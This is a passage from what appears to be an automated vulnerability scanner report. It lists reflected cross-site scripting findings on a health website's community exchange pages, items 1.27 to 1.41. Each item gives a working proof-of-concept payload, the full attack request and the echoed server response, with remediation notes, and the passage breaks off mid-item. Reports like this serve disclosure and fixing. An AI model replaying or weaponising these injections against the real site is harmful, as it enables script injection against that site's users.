html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesade90'-alert(1)-'2e050d781bd%252fhealth-experts&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.27. http://exchanges.webmd.com/webmd-exchanges/health-experts [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/health-experts

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f697'-alert(1)-'fa1f5d7ac38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/health-experts4f697'-alert(1)-'fa1f5d7ac38 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59521
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fhealth-experts4f697'-alert(1)-'fa1f5d7ac38&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.28. http://exchanges.webmd.com/webmd-exchanges/health-experts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/health-experts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8af3'-alert(1)-'a912fc71e69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/health-experts?d8af3'-alert(1)-'a912fc71e69=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 139321
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:50 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
md.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=1680&sec=&au1=&au2=&uri=%2fwebmd-exchanges%2fhealth-experts%3fd8af3'-alert(1)-'a912fc71e69%3d1&artid=091e9c5e80471487&inst=0&amp;leaf=">
...[SNIP]...

1.29. http://exchanges.webmd.com/webmd-exchanges/health-experts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/health-experts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5de1a"-alert(1)-"91ad6104c69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/health-experts?5de1a"-alert(1)-"91ad6104c69=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 139339
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:49 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/health-experts?5de1a"-alert(1)-"91ad6104c69=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.30. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8a7d'-alert(1)-'2bc8179e737 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangese8a7d'-alert(1)-'2bc8179e737/mens-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59542
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangese8a7d'-alert(1)-'2bc8179e737%252fmens-health-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.31. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4329c'-alert(1)-'267b3d24388 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mens-health-exchanges4329c'-alert(1)-'267b3d24388 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59542
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:34 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ansID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fmens-health-exchanges4329c'-alert(1)-'267b3d24388&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.32. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b409b"-alert(1)-"5b935ffdb1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mens-health-exchanges?b409b"-alert(1)-"5b935ffdb1e=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67583
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/mens-health-exchanges?b409b"-alert(1)-"5b935ffdb1e=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.33. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a9c9'-alert(1)-'2ea3574cdc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mens-health-exchanges?4a9c9'-alert(1)-'2ea3574cdc6=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67571
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ransactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fmens-health-exchanges%3f4a9c9'-alert(1)-'2ea3574cdc6%3d1&artid=091e9c5e805cc663&inst=0&amp;leaf=">
...[SNIP]...

1.34. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c74f6'-alert(1)-'e9209004a68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesc74f6'-alert(1)-'e9209004a68/mental-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59548
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesc74f6'-alert(1)-'e9209004a68%252fmental-health-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.35. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d42e3'-alert(1)-'cbdce0ced1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mental-health-exchangesd42e3'-alert(1)-'cbdce0ced1c HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59548
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
sID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fmental-health-exchangesd42e3'-alert(1)-'cbdce0ced1c&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.36. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbecd"-alert(1)-"9e03d84b4ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mental-health-exchanges?dbecd"-alert(1)-"9e03d84b4ea=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70718
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:56 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/mental-health-exchanges?dbecd"-alert(1)-"9e03d84b4ea=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.37. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 262b4'-alert(1)-'188039677da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mental-health-exchanges?262b4'-alert(1)-'188039677da=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70702
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
nsactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fmental-health-exchanges%3f262b4'-alert(1)-'188039677da%3d1&artid=091e9c5e805cc029&inst=0&amp;leaf=">
...[SNIP]...

1.38. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3538e'-alert(1)-'849fcdc23ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges3538e'-alert(1)-'849fcdc23ec/parenting-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59536
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:39 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges3538e'-alert(1)-'849fcdc23ec%252fparenting-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.39. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2743a'-alert(1)-'382aab0a04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/parenting-exchanges2743a'-alert(1)-'382aab0a04 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59533
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:52 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fparenting-exchanges2743a'-alert(1)-'382aab0a04&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.40. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6671e'-alert(1)-'9922d39748e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/parenting-exchanges?6671e'-alert(1)-'9922d39748e=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78864
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:25 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fparenting-exchanges%3f6671e'-alert(1)-'9922d39748e%3d1&artid=091e9c5e8055d4d0&inst=0&amp;leaf=">
...[SNIP]...

1.41. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2785"-alert(1)-"fced948cb12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/parenting-exchanges?f2785"-alert(1)-"fced948cb12=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78876
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:23 GMT


